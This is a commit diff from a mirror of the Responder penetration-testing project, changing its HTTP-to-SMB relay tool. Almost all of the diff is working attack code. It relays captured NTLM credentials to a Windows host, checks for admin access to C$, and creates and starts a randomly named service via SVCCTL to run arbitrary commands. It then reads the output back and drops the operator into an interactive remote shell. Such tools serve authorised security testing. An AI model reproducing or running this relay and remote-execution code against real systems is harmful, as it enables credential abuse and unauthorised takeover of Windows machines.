github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-21 13:53:42 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Using Trans pipes instead of read/writes & fixed low priv bug which drops you in a shell while the user has no rights

Browse source
This commit is contained in:
lgandx 2016-10-04 21:19:08 -03:00
commit 3d3a19f66b
2 changed files with 148 additions and 101 deletions
Download patch file Download diff file Expand all files Collapse all files

221
tools/RelayHTTPSMB/HTTPRelayPacket.py
View file

@ -397,6 +397,56 @@ class SMBWriteData(Packet):
self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"]))) self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"]))) self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBTransDCERPC(Packet):
fields = OrderedDict([
("Wordcount", "\x10"),
("TotalParamCount", "\x00\x00"),
("TotalDataCount", "\x00\x00" ),
("MaxParamCount", "\x00\x00"),
("MaxDataCount", "\x00\x04"),
("MaxSetupCount", "\x00"),
("Reserved", "\x00\x00"),
("Flags", "\x00"),
("Timeout", "\x00\x00\x00\x00"),
("Reserved1", "\x00\x00"),
("ParamCount", "\x00\x00"),
("ParamOffset", "\x00\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x00\x00"),
("SetupCount", "\x02"),
("Reserved2", "\x00"),
("OpNum", "\x26\x00"),
("FID", "\x00\x00"),
("Bcc", "\x00\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\"),
("PipeTerminator", "\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
##Data Len
self.fields["TotalDataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
self.fields["DataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
##Packet len
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
self.fields["ParamOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
self.fields["DataOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
class SMBDCEData(Packet): class SMBDCEData(Packet):
fields = OrderedDict([ fields = OrderedDict([
("Version", "\x05"), ("Version", "\x05"),
@ -435,10 +485,10 @@ class SMBDCEPacketData(Packet):
("PacketType", "\x00"), ("PacketType", "\x00"),
("PacketFlag", "\x03"), ("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"), ("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"), ("FragLen", "\x00\x00"),
("AuthLen", "\x00\x00"), ("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"), ("CallID", "\x00\x00\x00\x00"),
("AllocHint", "\x38\x00\x00\x00"), ("AllocHint", "\x00\x00\x00\x00"),
("ContextID", "\x00\x00"), ("ContextID", "\x00\x00"),
("Opnum", "\x0f\x00"), ("Opnum", "\x0f\x00"),
("Data", ""), ("Data", ""),
@ -455,17 +505,19 @@ class SMBDCEPacketData(Packet):
class SMBDCESVCCTLOpenManagerW(Packet): class SMBDCESVCCTLOpenManagerW(Packet):
fields = OrderedDict([ fields = OrderedDict([
("MachineNameRefID", "\xb5\x97\xb9\xbc"), ("MachineNameRefID", "\xb5\x97\xb9\xbc"),
("MaxCount", "\x0f\x00\x00\x00"), ("MaxCount", "\x0f\x00\x00\x00"),#need to calc.
("Offset", "\x00\x00\x00\x00"), ("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0f\x00\x00\x00"), ("ActualCount", "\x0f\x00\x00\x00"),#need to calc.
("MachineName", "\\\\169.220.1.11"),##This is not taken into consideration. ("MachineName", ""),
("MachineNameNull", "\x00\x00\x00\x00"), ("MachineNameNull", "\x00\x00"),
("DbPointer", "\x00\x00\x00\x00"), ("DbPointer", "\x00\x00\x00\x00"),
("AccessMask", "\x3f\x00\x0f\x00"), ("AccessMask", "\x3f\x00\x0f\x00"),
]) ])
def calculate(self): def calculate(self):
## Convert to UTF-16LE ## Convert to UTF-16LE
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le') self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
class SMBDCESVCCTLCreateService(Packet): class SMBDCESVCCTLCreateService(Packet):
@ -476,7 +528,7 @@ class SMBDCESVCCTLCreateService(Packet):
("ActualCount", "\x0c\x00\x00\x00"), ("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"), ("ServiceName", "AyAGaxwLhCP"),
("MachineNameNull", "\x00\x00"), ("MachineNameNull", "\x00\x00"),
("ReferentID", "\x9c\xfa\x9a\xc9"), ("ReferentID", "\x00\x00\x02\x00"),
("MaxCountRefID", "\x11\x00\x00\x00"), ("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"), ("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"), ("ActualCountRefID", "\x11\x00\x00\x00"),
@ -493,8 +545,16 @@ class SMBDCESVCCTLCreateService(Packet):
("BinPathName", ""), ("BinPathName", ""),
("BinCMD", ""), ("BinCMD", ""),
("BintoEnd", ""), ("BintoEnd", ""),
("BinPathNameNull", "\x00\x00"), ("BinCMDTerminator", "\x00\x00"),
("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"), ("LoadOrderGroup", "\x00\x00\x00\x00"),
("TagID", "\x00\x00\x00\x00"),
("Dependencies", "\x00\x00\x00\x00"),
("DependenciesLen", "\x00\x00\x00\x00"),
("ServiceStartName", "\x00\x00\x00\x00"),
("Password", "\x00\x00\x00\x00"),
("PasswordLen", "\x00\x00\x00\x00"),
("Padding", "\x00\x00"),
]) ])
def calculate(self): def calculate(self):
@ -540,9 +600,9 @@ class SMBDCESVCCTLCreateService(Packet):
class SMBDCESVCCTLOpenService(Packet): class SMBDCESVCCTLOpenService(Packet):
fields = OrderedDict([ fields = OrderedDict([
("ContextHandle", ""), ("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"), ("MaxCount", "\x00\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"), ("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"), ("ActualCount", "\x00\x00\x00\x00"),
("ServiceName", ""), ("ServiceName", ""),
("MachineNameNull", "\x00\x00"), ("MachineNameNull", "\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"), ("AccessMask", "\xff\x01\x0f\x00"),
@ -708,7 +768,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
## DCE/RPC Read. ## DCE/RPC Read.
if data[8:10] == "\x2f\x00": if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f) t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
t.calculate() t.calculate()
packet0 = str(head)+str(t) packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
@ -716,121 +776,90 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
data = s.recv(2048) data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW. ## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")#, MachineName="\\\\"+Host[0]) w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=Host[0])
w.calculate() w.calculate()
x = SMBDCEPacketData(Data=w) x = SMBDCEPacketData(Data=w)
x.calculate() x.calculate()
t = SMBWriteData(FID=f,Data=x) t = SMBTransDCERPC(FID=f,Data=x)
t.calculate() t.calculate()
packet0 = str(head)+str(t) packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00": ##Error handling.
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) if data[8:10] == "\x2e\x00":
t = SMBReadData(FID=f) if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
return False
## DCE/RPC Create Service.
if data[8:10] == "\x25\x00":
ContextHandler = data[84:104]
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
FilePath = FileChars
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath,BinCMD=Command)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate() t.calculate()
packet0 = str(head)+str(t) packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
## DCE/RPC SVCCTLCreateService. #print "[+] Creating service"
if data[8:10] == "\x2e\xb0":
print "[+] Server returned NT_STATUS_PIPE_DISCONNECTED, no admin rights on that pipe.\n" ## DCE/RPC SVCCTLOpenService.
return False if data[8:10] == "\x25\x00":
## DCE/RPC SVCCTLCreateService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print "[+] Failed to create the service\n"
return False return False
#print "[+] Creating service" #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
ContextHandler = data[88:108] w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
FilePath = FileChars
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath, ReferentID="\x21\x03\x03\x00",BinCMD=Command)
w.calculate() w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate() x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x) t = SMBTransDCERPC(FID=f,Data=x)
t.calculate() t.calculate()
packet0 = str(head)+str(t) packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00": ## DCE/RPC SVCCTLStartService.
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) if data[8:10] == "\x25\x00":
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00") if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
return False
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate() t.calculate()
packet0 = str(head)+str(t) packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
return False
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0c\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0d\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
return False
ContextHandler = data[88:108]
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0e\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0f\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
##Tree connect c$ ##Tree connect c$
if data[8:10] == "\x2e\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
return False
#print "[+] Command executed, grabbing output now." #print "[+] Command executed, grabbing output now."
Logs.info('Command executed:') Logs.info('Command executed:')
Logs.info(clientIP+","+Username+','+Command) Logs.info(clientIP+","+Username+','+Command)
#time.sleep(1)#Maybe the command executed took some time.. #print "[+] Removing service.\n[+] Cleaning up output file.\n"
#print "[+] Removing service.\n[+] Cleaning up files.\n"
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$") t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate() t.calculate()
@ -862,6 +891,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
time.sleep(1)#not found, command failed. time.sleep(1)#not found, command failed.
print "[+] The command failed." print "[+] The command failed."
return data return data
##ReadRequest. ##ReadRequest.
## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed. ## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
if data[8:10] == "\x2d\x00": if data[8:10] == "\x2d\x00":
@ -906,3 +936,4 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
data = s.recv(2048) data = s.recv(2048)
return data return data

28
tools/RelayHTTPSMB/HTTPToSMBRelay.py
View file

@ -271,15 +271,18 @@ def HTTPProxyRelay():
data = conn.recv(4096) data = conn.recv(4096)
except: except:
return None, None, None, None, None return None
def RunPsExec(Host): def RunPsExec(Host):
data, s, clientIP, Username, Domain = HTTPProxyRelay() GetCredentials = HTTPProxyRelay()
if data == None:
if GetCredentials == None:
return False return False
data, s, clientIP, Username, Domain = GetCredentials
if data[8:10] == "\x73\x6d": if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder." print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
@ -288,11 +291,12 @@ def RunPsExec(Host):
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
## First, check if user has admin privs on C$:
## Tree Connect ## Tree Connect
if data[8:10] == "\x73\x00": if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#Verify if the target returned a guest session. GetSessionResponseFlags(data)#Verify if the target returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$") t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
@ -301,16 +305,27 @@ def RunPsExec(Host):
## Fail Handling. ## Fail Handling.
if data[8:10] == "\x75\x22": if data[8:10] == "\x75\x22":
print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or low privilege user.\n[+] Hashes were saved anyways in Responder/logs/ folder." print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or this is a low privileged user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
return False return False
## Tree Connect
if data[8:10] == "\x75\x00":
print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## NtCreateAndx ## NtCreateAndx
if data[8:10] == "\x75\x00": if data[8:10] == "\x75\x00":
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
while True: while True:
if data[8:10] == "\x75\x00": if data[8:10] == "\x75\x00":
thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs. #thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
thread.start_new_thread(get_command, ()) thread.start_new_thread(get_command, ())
while Cmd == "": while Cmd == "":
pass pass
@ -359,3 +374,4 @@ if __name__ == '__main__':
main() main()
except: except:
raise raise